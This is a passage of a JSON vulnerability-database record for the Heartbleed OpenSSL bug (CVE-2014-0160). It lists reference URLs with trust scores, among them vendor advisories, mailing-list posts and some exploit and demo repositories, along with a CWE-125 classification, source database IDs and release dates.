"title": "awesome-web-hacking",
"trust": 0.1,
"url": "https://github.com/thanshurc/awesome-web-hacking "
},
{
"title": "hack",
"trust": 0.1,
"url": "https://github.com/nvnpsplt/hack "
},
{
"title": "awesome-web-hacking",
"trust": 0.1,
"url": "https://github.com/noname1007/awesome-web-hacking "
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/ImranTheThirdEye/awesome-web-hacking "
},
{
"title": "web-hacking",
"trust": 0.1,
"url": "https://github.com/Ondrik8/web-hacking "
},
{
"title": "CheckSSL-ciphersuite",
"trust": 0.1,
"url": "https://github.com/kal1gh0st/CheckSSL-ciphersuite "
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/undacmic/HeartBleed-Demo "
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/MrE-Fog/ssl-heartbleed.nse "
},
{
"title": "welivesecurity",
"trust": 0.1,
"url": "https://www.welivesecurity.com/2015/08/03/worlds-biggest-bug-bounty-payouts/"
},
{
"title": "Threatpost",
"trust": 0.1,
"url": "https://threatpost.com/oracle-gives-heartbleed-update-patches-14-products/105576/"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2014-0160"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-125",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2014-0160"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 2.7,
"url": "http://rhn.redhat.com/errata/rhsa-2014-0376.html"
},
{
"trust": 1.9,
"url": "http://heartbleed.com/"
},
{
"trust": 1.9,
"url": "http://blog.fox-it.com/2014/04/08/openssl-heartbleed-bug-live-blog/"
},
{
"trust": 1.9,
"url": "https://www.cert.fi/en/reports/2014/vulnerability788210.html"
},
{
"trust": 1.9,
"url": "https://code.google.com/p/mod-spdy/issues/detail?id=85"
},
{
"trust": 1.9,
"url": "https://blog.torproject.org/blog/openssl-bug-cve-2014-0160"
},
{
"trust": 1.9,
"url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20140409-heartbleed"
},
{
"trust": 1.9,
"url": "http://www.debian.org/security/2014/dsa-2896"
},
{
"trust": 1.9,
"url": "https://support.f5.com/kb/en-us/solutions/public/15000/100/sol15159.html?sr=36517217"
},
{
"trust": 1.9,
"url": "http://www.oracle.com/technetwork/topics/security/opensslheartbleedcve-2014-0160-2188454.html"
},
{
"trust": 1.7,
"url": "http://www.getchef.com/blog/2014/04/09/enterprise-chef-11-1-3-release/"
},
{
"trust": 1.7,
"url": "http://www.getchef.com/blog/2014/04/09/chef-server-heartbleed-cve-2014-0160-releases/"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2014-0160"
},
{
"trust": 1.2,
"url": "http://www.ubuntu.com/usn/usn-2165-1"
},
{
"trust": 1.1,
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1084875"
},
{
"trust": 1.1,
"url": "http://www.openssl.org/news/secadv_20140407.txt"
},
{
"trust": 1.1,
"url": "http://www.securitytracker.com/id/1030078"
},
{
"trust": 1.1,
"url": "http://seclists.org/fulldisclosure/2014/apr/109"
},
{
"trust": 1.1,
"url": "http://seclists.org/fulldisclosure/2014/apr/190"
},
{
"trust": 1.1,
"url": "https://lists.balabit.hu/pipermail/syslog-ng-announce/2014-april/000184.html"
},
{
"trust": 1.1,
"url": "http://rhn.redhat.com/errata/rhsa-2014-0396.html"
},
{
"trust": 1.1,
"url": "http://www.securitytracker.com/id/1030082"
},
{
"trust": 1.1,
"url": "http://secunia.com/advisories/57347"
},
{
"trust": 1.1,
"url": "http://marc.info/?l=bugtraq\u0026m=139722163017074\u0026w=2"
},
{
"trust": 1.1,
"url": "http://www.securitytracker.com/id/1030077"
},
{
"trust": 1.1,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21670161"
},
{
"trust": 1.1,
"url": "http://rhn.redhat.com/errata/rhsa-2014-0377.html"
},
{
"trust": 1.1,
"url": "http://www.securitytracker.com/id/1030080"
},
{
"trust": 1.1,
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-april/131221.html"
},
{
"trust": 1.1,
"url": "http://www.securitytracker.com/id/1030074"
},
{
"trust": 1.1,
"url": "http://seclists.org/fulldisclosure/2014/apr/90"
},
{
"trust": 1.1,
"url": "http://www.securitytracker.com/id/1030081"
},
{
"trust": 1.1,
"url": "http://rhn.redhat.com/errata/rhsa-2014-0378.html"
},
{
"trust": 1.1,
"url": "http://seclists.org/fulldisclosure/2014/apr/91"
},
{
"trust": 1.1,
"url": "http://secunia.com/advisories/57483"
},
{
"trust": 1.1,
"url": "http://www.splunk.com/view/sp-caaamb3"
},
{
"trust": 1.1,
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-april/131291.html"
},
{
"trust": 1.1,
"url": "http://www.securitytracker.com/id/1030079"
},
{
"trust": 1.1,
"url": "http://lists.opensuse.org/opensuse-security-announce/2014-04/msg00004.html"
},
{
"trust": 1.1,
"url": "http://secunia.com/advisories/57721"
},
{
"trust": 1.1,
"url": "http://www.blackberry.com/btsc/kb35882"
},
{
"trust": 1.1,
"url": "http://www.securitytracker.com/id/1030026"
},
{
"trust": 1.1,
"url": "http://lists.opensuse.org/opensuse-security-announce/2014-04/msg00005.html"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/bid/66690"
},
{
"trust": 1.1,
"url": "http://www.getchef.com/blog/2014/04/09/chef-server-11-0-12-release/"
},
{
"trust": 1.1,
"url": "http://www.us-cert.gov/ncas/alerts/ta14-098a"
},
{
"trust": 1.1,
"url": "http://www.getchef.com/blog/2014/04/09/enterprise-chef-1-4-9-release/"
},
{
"trust": 1.1,
"url": "http://secunia.com/advisories/57966"
},
{
"trust": 1.1,
"url": "http://www.f-secure.com/en/web/labs_global/fsc-2014-1"
},
{
"trust": 1.1,
"url": "http://seclists.org/fulldisclosure/2014/apr/173"
},
{
"trust": 1.1,
"url": "http://secunia.com/advisories/57968"
},
{
"trust": 1.1,
"url": "http://www.exploit-db.com/exploits/32745"
},
{
"trust": 1.1,
"url": "http://www.kb.cert.org/vuls/id/720951"
},
{
"trust": 1.1,
"url": "http://www.exploit-db.com/exploits/32764"
},
{
"trust": 1.1,
"url": "http://secunia.com/advisories/57836"
},
{
"trust": 1.1,
"url": "https://gist.github.com/chapmajs/10473815"
},
{
"trust": 1.1,
"url": "http://cogentdatahub.com/releasenotes.html"
},
{
"trust": 1.1,
"url": "http://marc.info/?l=bugtraq\u0026m=139905458328378\u0026w=2"
},
{
"trust": 1.1,
"url": "http://marc.info/?l=bugtraq\u0026m=139869891830365\u0026w=2"
},
{
"trust": 1.1,
"url": "http://marc.info/?l=bugtraq\u0026m=139889113431619\u0026w=2"
},
{
"trust": 1.1,
"url": "http://public.support.unisys.com/common/public/vulnerability/nvd_detail_rpt.aspx?id=1"
},
{
"trust": 1.1,
"url": "http://www.kerio.com/support/kerio-control/release-history"
},
{
"trust": 1.1,
"url": "http://public.support.unisys.com/common/public/vulnerability/nvd_detail_rpt.aspx?id=3"
},
{
"trust": 1.1,
"url": "http://advisories.mageia.org/mgasa-2014-0165.html"
},
{
"trust": 1.1,
"url": "https://h20566.www2.hp.com/portal/site/hpsc/template.page/public/kb/docdisplay/?spf_p.tpst=kbdocdisplay\u0026spf_p.prp_kbdocdisplay=wsrp-navigationalstate%3ddocid%253demr_na-c04260637-4%257cdoclocale%253den_us%257ccalledby%253dsearch_result\u0026javax.portlet.begcachetok=com.vignette.cachetoken\u0026javax.portlet.endcachetok=com.vignette.cachetoken"
},
{
"trust": 1.1,
"url": "http://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html"
},
{
"trust": 1.1,
"url": "http://www-01.ibm.com/support/docview.wss?uid=isg400001843"
},
{
"trust": 1.1,
"url": "https://filezilla-project.org/versions.php?type=server"
},
{
"trust": 1.1,
"url": "http://www-01.ibm.com/support/docview.wss?uid=isg400001841"
},
{
"trust": 1.1,
"url": "http://marc.info/?l=bugtraq\u0026m=141287864628122\u0026w=2"
},
{
"trust": 1.1,
"url": "http://seclists.org/fulldisclosure/2014/dec/23"
},
{
"trust": 1.1,
"url": "http://www.vmware.com/security/advisories/vmsa-2014-0012.html"
},
{
"trust": 1.1,
"url": "http://marc.info/?l=bugtraq\u0026m=142660345230545\u0026w=2"
},
{
"trust": 1.1,
"url": "http://www.websense.com/support/article/kbarticle/vulnerabilities-resolved-in-triton-apx-version-8-0"
},
{
"trust": 1.1,
"url": "http://www.mandriva.com/security/advisories?name=mdvsa-2015:062"
},
{
"trust": 1.1,
"url": "http://marc.info/?l=bugtraq\u0026m=139817727317190\u0026w=2"
},
{
"trust": 1.1,
"url": "http://marc.info/?l=bugtraq\u0026m=139757726426985\u0026w=2"
},
{
"trust": 1.1,
"url": "http://marc.info/?l=bugtraq\u0026m=139758572430452\u0026w=2"
},
{
"trust": 1.1,
"url": "http://marc.info/?l=bugtraq\u0026m=139905653828999\u0026w=2"
},
{
"trust": 1.1,
"url": "http://marc.info/?l=bugtraq\u0026m=139842151128341\u0026w=2"
},
{
"trust": 1.1,
"url": "http://marc.info/?l=bugtraq\u0026m=139905405728262\u0026w=2"
},
{
"trust": 1.1,
"url": "http://marc.info/?l=bugtraq\u0026m=139833395230364\u0026w=2"
},
{
"trust": 1.1,
"url": "http://marc.info/?l=bugtraq\u0026m=139824993005633\u0026w=2"
},
{
"trust": 1.1,
"url": "http://marc.info/?l=bugtraq\u0026m=139843768401936\u0026w=2"
},
{
"trust": 1.1,
"url": "http://marc.info/?l=bugtraq\u0026m=139905202427693\u0026w=2"
},
{
"trust": 1.1,
"url": "http://marc.info/?l=bugtraq\u0026m=139774054614965\u0026w=2"
},
{
"trust": 1.1,
"url": "http://marc.info/?l=bugtraq\u0026m=139889295732144\u0026w=2"
},
{
"trust": 1.1,
"url": "http://marc.info/?l=bugtraq\u0026m=139835815211508\u0026w=2"
},
{
"trust": 1.1,
"url": "http://marc.info/?l=bugtraq\u0026m=140724451518351\u0026w=2"
},
{
"trust": 1.1,
"url": "http://marc.info/?l=bugtraq\u0026m=139808058921905\u0026w=2"
},
{
"trust": 1.1,
"url": "http://marc.info/?l=bugtraq\u0026m=139836085512508\u0026w=2"
},
{
"trust": 1.1,
"url": "http://marc.info/?l=bugtraq\u0026m=139869720529462\u0026w=2"
},
{
"trust": 1.1,
"url": "http://marc.info/?l=bugtraq\u0026m=139905868529690\u0026w=2"
},
{
"trust": 1.1,
"url": "http://marc.info/?l=bugtraq\u0026m=139765756720506\u0026w=2"
},
{
"trust": 1.1,
"url": "http://marc.info/?l=bugtraq\u0026m=140015787404650\u0026w=2"
},
{
"trust": 1.1,
"url": "http://marc.info/?l=bugtraq\u0026m=139824923705461\u0026w=2"
},
{
"trust": 1.1,
"url": "http://marc.info/?l=bugtraq\u0026m=139757919027752\u0026w=2"
},
{
"trust": 1.1,
"url": "http://marc.info/?l=bugtraq\u0026m=139774703817488\u0026w=2"
},
{
"trust": 1.1,
"url": "http://marc.info/?l=bugtraq\u0026m=139905243827825\u0026w=2"
},
{
"trust": 1.1,
"url": "http://marc.info/?l=bugtraq\u0026m=140075368411126\u0026w=2"
},
{
"trust": 1.1,
"url": "http://marc.info/?l=bugtraq\u0026m=139905295427946\u0026w=2"
},
{
"trust": 1.1,
"url": "http://marc.info/?l=bugtraq\u0026m=139835844111589\u0026w=2"
},
{
"trust": 1.1,
"url": "http://marc.info/?l=bugtraq\u0026m=139757819327350\u0026w=2"
},
{
"trust": 1.1,
"url": "http://marc.info/?l=bugtraq\u0026m=139817685517037\u0026w=2"
},
{
"trust": 1.1,
"url": "http://marc.info/?l=bugtraq\u0026m=139905351928096\u0026w=2"
},
{
"trust": 1.1,
"url": "http://marc.info/?l=bugtraq\u0026m=139817782017443\u0026w=2"
},
{
"trust": 1.1,
"url": "http://marc.info/?l=bugtraq\u0026m=140752315422991\u0026w=2"
},
{
"trust": 1.1,
"url": "http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory\u0026pvid=security_advisory\u0026year=\u0026suid=20160512_00"
},
{
"trust": 1.1,
"url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004661"
},
{
"trust": 1.1,
"url": "http://www.innominate.com/data/downloads/manuals/mdm_1.5.2.1_release_notes.pdf"
},
{
"trust": 1.1,
"url": "http://www.apcmedia.com/salestools/sjhn-7rkgnm/sjhn-7rkgnm_r4_en.pdf"
},
{
"trust": 1.1,
"url": "http://secunia.com/advisories/59347"
},
{
"trust": 1.1,
"url": "http://secunia.com/advisories/59243"
},
{
"trust": 1.1,
"url": "http://secunia.com/advisories/59139"
},
{
"trust": 1.1,
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-august/136473.html"
},
{
"trust": 1.1,
"url": "http://download.schneider-electric.com/files?p_doc_ref=sevd%202014-119-01"
},
{
"trust": 1.1,
"url": "https://support.f5.com/kb/en-us/solutions/public/15000/100/sol15159.html"
},
{
"trust": 1.1,
"url": "http://support.citrix.com/article/ctx140605"
},
{
"trust": 1.1,
"url": "http://lists.opensuse.org/opensuse-updates/2014-04/msg00061.html"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/archive/1/534161/100/0/threaded"
},
{
"trust": 1.1,
"url": "https://www.mitel.com/en-ca/support/security-advisories/mitel-product-security-advisory-17-0008"
},
{
"trust": 1.1,
"url": "https://sku11army.blogspot.com/2020/01/heartbleed-hearts-continue-to-bleed.html"
},
{
"trust": 1.1,
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-635659.pdf"
},
{
"trust": 1.1,
"url": "https://yunus-shn.medium.com/ricon-industrial-cellular-router-heartbleed-attack-2634221c02bd"
},
{
"trust": 1.1,
"url": "http://git.openssl.org/gitweb/?p=openssl.git%3ba=commit%3bh=96db9023b881d7cd9f379b0c154650d6c108e9a3"
},
{
"trust": 1.1,
"url": "https://lists.apache.org/thread.html/ba661b0edd913b39ff129a32d855620dd861883ade05fd88a8ce517d%40%3cdev.tomcat.apache.org%3e"
},
{
"trust": 1.1,
"url": "https://lists.apache.org/thread.html/f8e0814e11c7f21f42224b6de111cb3f5e5ab5c15b78924c516d4ec2%40%3cdev.tomcat.apache.org%3e"
},
{
"trust": 1.1,
"url": "https://lists.apache.org/thread.html/rf8e8c091182b45daa50d3557cad9b10bb4198e3f08cf8f1c66a1b08d%40%3cdev.tomcat.apache.org%3e"
},
{
"trust": 1.1,
"url": "https://lists.apache.org/thread.html/re3b72cbb13e1dfe85c4a06959a3b6ca6d939b407ecca80db12b54220%40%3cdev.tomcat.apache.org%3e"
},
{
"trust": 1.1,
"url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/"
},
{
"trust": 1.1,
"url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secbullarchive/"
},
{
"trust": 1.1,
"url": "http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins"
},
{
"trust": 1.0,
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=cve-2014-0160"
},
{
"trust": 0.8,
"url": "http://seclists.org/oss-sec/2014/q2/22"
},
{
"trust": 0.8,
"url": "http://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=96db902"
},
{
"trust": 0.8,
"url": "https://tools.ietf.org/html/rfc6520"
},
{
"trust": 0.8,
"url": "http://www.openssl.org/news/openssl-1.0.1-notes.html"
},
{
"trust": 0.8,
"url": "http://www.hut3.net/blog/cns---networks-security/2014/04/14/bugs-in-heartbleed-detection-scripts-"
},
{
"trust": 0.8,
"url": "http://blog.cryptographyengineering.com/2014/04/attack-of-week-openssl-heartbleed.html"
},
{
"trust": 0.8,
"url": "http://xkcd.com/1354/"
},
{
"trust": 0.8,
"url": "http://www.exploit-db.com/exploits/32745/"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/cve/cve-2014-0160 "
},
{
"trust": 0.8,
"url": "http://www.ubuntu.com/usn/usn-2165-1/"
},
{
"trust": 0.8,
"url": "http://www.freshports.org/security/openssl/"
},
{
"trust": 0.8,
"url": "http://kb.bluecoat.com/index?page=content\u0026id=sa79"
},
{
"trust": 0.8,
"url": "https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentid="
},
{
"trust": 0.8,
"url": "http://learn.extremenetworks.com/rs/extreme/images/cert_vu%23720951_vulnerability_advisory_04_11_2014v2.pdf"
},
{
"trust": 0.8,
"url": "http://www.fortiguard.com/advisory/fg-ir-14-011/"
},
{
"trust": 0.8,
"url": "http://www.freebsd.org/security/advisories/freebsd-sa-14:06.openssl.asc"
},
{
"trust": 0.8,
"url": "http://www.gentoo.org/security/en/glsa/glsa-201404-07.xml"
},
{
"trust": 0.8,
"url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04239375"
},
{
"trust": 0.8,
"url": "http://www.hitachi.com/hirt/publications/hirt-pub14005/index.html"
},
{
"trust": 0.8,
"url": "http://www-01.ibm.com/support/docview.wss?\u0026uid=swg21669774"
},
{
"trust": 0.8,
"url": "https://security-center.intel.com/advisory.aspx?intelid=intel-sa-00037\u0026languageid=en-fr"
},
{
"trust": 0.8,
"url": "https://kb.juniper.net/jsa10623"
},
{
"trust": 0.8,
"url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10071"
},
{
"trust": 0.8,
"url": "http://mail-index.netbsd.org/security-announce/2014/04/08/msg000085.html"
},
{
"trust": 0.8,
"url": "http://ftp.openbsd.org/pub/openbsd/patches/5.3/common/014_openssl.patch"
},
{
"trust": 0.8,
"url": "http://www.slackware.com/security/viewer.php?l=slackware-security\u0026y=2014\u0026m=slackware-security.533622"
},
{
"trust": 0.8,
"url": "http://kb.vmware.com/kb/2076225"
},
{
"trust": 0.8,
"url": "https://support.windriver.com/"
},
{
"trust": 0.8,
"url": "http://blogs.technet.com/b/security/archive/2014/04/10/microsoft-devices-and-services-and-the-openssl-heartbleed-vulnerability.aspx"
},
{
"trust": 0.8,
"url": "https://forum.peplink.com/threads/3062-special-notice-on-openssl-heartbleed-vulnerability"
},
{
"trust": 0.8,
"url": "https://supportcenter.checkpoint.com/supportcenter/portal?eventsubmit_dogoviewsolutiondetails=\u0026solutionid=sk100173"
},
{
"trust": 0.8,
"url": "http://jpn.nec.com/security-info/av14-001.html"
},
{
"trust": 0.6,
"url": "https://www.suse.com/support/update/announcement/2014/suse-su-20140734-1.html"
},
{
"trust": 0.3,
"url": "rubygems.org/gems/actionpack"
},
{
"trust": 0.3,
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1036483"
},
{
"trust": 0.3,
"url": "http://puppetlabs.com/security/cve/cve-2013-6414"
},
{
"trust": 0.3,
"url": "http://rubygems.org/"
},
{
"trust": 0.3,
"url": "https://rhn.redhat.com/errata/rhsa-2014-0008.html"
},
{
"trust": 0.3,
"url": "https://rhn.redhat.com/errata/rhsa-2013-1794.html"
},
{
"trust": 0.3,
"url": "http://puppetlabs.com/security/cve/cve-2014-0082"
},
{
"trust": 0.3,
"url": "http://weblog.rubyonrails.org/2014/2/18/rails_3_2_17_4_0_3_and_4_1_0_beta2_have_been_released/"
},
{
"trust": 0.3,
"url": "http://rubyonrails.org/"
},
{
"trust": 0.3,
"url": "https://rhn.redhat.com/errata/rhsa-2014-0306.html"
},
{
"trust": 0.3,
"url": "https://rhn.redhat.com/errata/rhsa-2014-0215.html"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-4353"
},
{
"trust": 0.2,
"url": "http://www.hp.com/swpublishing/mtx-d1488fd987894bc4ab3fe0ef52"
},
{
"trust": 0.2,
"url": "http://www.hp.com/swpublishing/mtx-4575754bbb614b58bf0ae1ac37"
},
{
"trust": 0.2,
"url": "http://www.hp.com/swpublishing/mtx-bfd3c0fb11184796b9428ced37"
},
{
"trust": 0.2,
"url": "http://support.openview.hp.com/downloads.jsp"
},
{
"trust": 0.2,
"url": "http://www8.h"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2014-0076"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/125.html"
},
{
"trust": 0.1,
"url": "http://seclists.org/fulldisclosure/2019/jan/42"
},
{
"trust": 0.1,
"url": "https://www.debian.org/security/./dsa-2896"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://threatpost.com/oracle-gives-heartbleed-update-patches-14-products/105576/"
},
{
"trust": 0.1,
"url": "https://ics-cert.us-cert.gov/advisories/icsa-14-135-02"
},
{
"trust": 0.1,
"url": "https://usn.ubuntu.com/2165-1/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-6450"
},
{
"trust": 0.1,
"url": "http://h17007.www1.hp.com/us/en/enterprise/servers/solutions/info-library"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-6449"
},
{
"trust": 0.1,
"url": "http://www.hp.com/swpublishing/mtx-3d92ccccf85f404e8ba36a8178"
},
{
"trust": 0.1,
"url": "http://www.hp.com/swpublishing/mtx-37075daeead2433cb41b59ae76"
},
{
"trust": 0.1,
"url": "http://www.hp.com/swpublishing/mtx-27e03b2f9cd24e77adc9dba94a"
},
{
"trust": 0.1,
"url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay/?docid=emr_n"
},
{
"trust": 0.1,
"url": "http://www.hp.com/go/insightupdates"
},
{
"trust": 0.1,
"url": "http://h20565.www2.hp.com/portal/site/hpsc/template.page/public/psi/swddetail"
},
{
"trust": 0.1,
"url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay/?docid=emr_"
},
{
"trust": 0.1,
"url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-4929"
},
{
"trust": 0.1,
"url": "https://www.redhat.com/security/data/cve/cve-2014-0160.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-0169"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.1,
"url": "https://www.redhat.com/security/data/cve/cve-2013-4353.html"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/team/key/#package"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/site/articles/11258"
},
{
"trust": 0.1,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"trust": 0.1,
"url": "https://rhn.redhat.com/errata/rhsa-2014-0416.html"
},
{
"trust": 0.1,
"url": "https://www.redhat.com/security/data/cve/cve-2013-0169.html"
},
{
"trust": 0.1,
"url": "https://www.redhat.com/security/data/cve/cve-2012-4929.html"
},
{
"trust": 0.1,
"url": "http://www.hp.com/swpublishing/mtx-41199f68c1144acb84a5798bf0"
},
{
"trust": 0.1,
"url": "http://www.hp.com/swpublishing/mtx-2e19c856f0e84e20a14c63ecd0"
},
{
"trust": 0.1,
"url": "http://support.openview.hp.com/selfsolve/document/lid/lrvug_00092"
},
{
"trust": 0.1,
"url": "http://support.openview.hp.com/selfsolve/document/lid/lrlg_00051"
},
{
"trust": 0.1,
"url": "http://support.openview.hp.com/selfsolve/document/lid/pc_00299"
},
{
"trust": 0.1,
"url": "http://support.openview.hp.com/selfsolve/document/lid/lranlsys_00074"
},
{
"trust": 0.1,
"url": "http://support.openview.hp.com/selfsolve/document/lid/lr_03305"
},
{
"trust": 0.1,
"url": "http://support.openview.hp.com/selfsolve/document/lid/lr_03329"
},
{
"trust": 0.1,
"url": "http://support.openview.hp.com/selfsolve/document/lid/pc_00296"
},
{
"trust": 0.1,
"url": "http://support.openview.hp.com/selfsolve/document/lid/lr_03307"
},
{
"trust": 0.1,
"url": "http://support.openview.hp.com/selfsolve/document/lid/lrlg_00052"
},
{
"trust": 0.1,
"url": "http://support.openview.hp.com/selfsolve/document/lid/lr_03315"
},
{
"trust": 0.1,
"url": "http://support.openview.hp.com/selfsolve/document/lid/lr_03306"
},
{
"trust": 0.1,
"url": "http://support.openview.hp.com/selfsolve/document/lid/lranlsys_00075"
},
{
"trust": 0.1,
"url": "http://support.openview.hp.com/selfsolve/document/lid/lr_03328"
},
{
"trust": 0.1,
"url": "http://support.openview.hp.com/selfsolve/document/lid/lr_03332"
},
{
"trust": 0.1,
"url": "http://support.openview.hp.com/selfsolve/document/lid/lrvug_00094"
},
{
"trust": 0.1,
"url": "http://support.openview.hp.com/selfsolve/document/lid/lr_03316"
},
{
"trust": 0.1,
"url": "http://support.openview.hp.com/selfsolve/document/lid/lr_03304"
},
{
"trust": 0.1,
"url": "http://support.openview.hp.com/selfsolve/document/lid/lr_03333"
},
{
"trust": 0.1,
"url": "http://h18013.www1.hp.com/products/servers/management/agents/index.html"
},
{
"trust": 0.1,
"url": "http://eprint.iacr.org/2014/140"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0160"
},
{
"trust": 0.1,
"url": "http://slackware.com"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0076"
},
{
"trust": 0.1,
"url": "http://osuosl.org)"
},
{
"trust": 0.1,
"url": "http://slackware.com/gpg-key"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/openssl/1.0.1-4ubuntu5.12"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/openssl/1.0.1e-3ubuntu1.2"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/openssl/1.0.1c-3ubuntu2.7"
},
{
"trust": 0.1,
"url": "http://www.hp.com/support/eslg3"
},
{
"trust": 0.1,
"url": "http://www.hp.com/swpublishing/mtx-9c71e9ff82af4d1fbdea666d97"
},
{
"trust": 0.1,
"url": "http://www.hp.com/swpublishing/mtx-ade2403c9999459aa758e16d46"
},
{
"trust": 0.1,
"url": "http://www.hp.com/swpublishing/mtx-16533b4917c84c8c81b703f354"
},
{
"trust": 0.1,
"url": "http://www.hp.com/swpublishing/mtx-06eee9db0f4a40d98d8cb32421"
},
{
"trust": 0.1,
"url": "https://h20564.www2.hp.com/portal/site/hpsc/p"
},
{
"trust": 0.1,
"url": "https://h20564.www2.hp.com/portal/site/hpsc/"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#720951"
},
{
"db": "VULMON",
"id": "CVE-2014-0160"
},
{
"db": "BID",
"id": "64074"
},
{
"db": "BID",
"id": "65604"
},
{
"db": "PACKETSTORM",
"id": "126605"
},
{
"db": "PACKETSTORM",
"id": "126954"
},
{
"db": "PACKETSTORM",
"id": "126284"
},
{
"db": "PACKETSTORM",
"id": "126361"
},
{
"db": "PACKETSTORM",
"id": "126197"
},
{
"db": "PACKETSTORM",
"id": "126417"
},
{
"db": "PACKETSTORM",
"id": "126305"
},
{
"db": "PACKETSTORM",
"id": "126644"
},
{
"db": "PACKETSTORM",
"id": "126164"
},
{
"db": "PACKETSTORM",
"id": "126086"
},
{
"db": "PACKETSTORM",
"id": "126045"
},
{
"db": "PACKETSTORM",
"id": "127279"
},
{
"db": "PACKETSTORM",
"id": "127085"
},
{
"db": "PACKETSTORM",
"id": "126784"
},
{
"db": "NVD",
"id": "CVE-2014-0160"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "CERT/CC",
"id": "VU#720951",
"ident": null
},
{
"db": "VULMON",
"id": "CVE-2014-0160",
"ident": null
},
{
"db": "BID",
"id": "64074",
"ident": null
},
{
"db": "BID",
"id": "65604",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "126605",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "126954",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "126284",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "126361",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "126197",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "126417",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "126305",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "126644",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "126164",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "126086",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "126045",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "127279",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "127085",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "126784",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2014-0160",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2014-04-08T00:00:00",
"db": "CERT/CC",
"id": "VU#720951",
"ident": null
},
{
"date": "2014-04-07T00:00:00",
"db": "VULMON",
"id": "CVE-2014-0160",
"ident": null
},
{
"date": "2013-12-02T00:00:00",
"db": "BID",
"id": "64074",
"ident": null
},
{
"date": "2014-02-18T00:00:00",
"db": "BID",
"id": "65604",
"ident": null
},
{
"date": "2014-05-13T18:24:00",
"db": "PACKETSTORM",
"id": "126605",
"ident": null
},
{
"date": "2014-06-05T21:02:31",
"db": "PACKETSTORM",
"id": "126954",
"ident": null
},
{
"date": "2014-04-23T21:25:00",
"db": "PACKETSTORM",
"id": "126284",
"ident": null
},
{
"date": "2014-04-28T20:36:00",
"db": "PACKETSTORM",
"id": "126361",
"ident": null
},
{
"date": "2014-04-17T22:02:09",
"db": "PACKETSTORM",
"id": "126197",
"ident": null
},
{
"date": "2014-05-01T02:16:33",
"db": "PACKETSTORM",
"id": "126417",
"ident": null
},
{
"date": "2014-04-24T22:21:23",
"db": "PACKETSTORM",
"id": "126305",
"ident": null
},
{
"date": "2014-05-16T04:40:57",
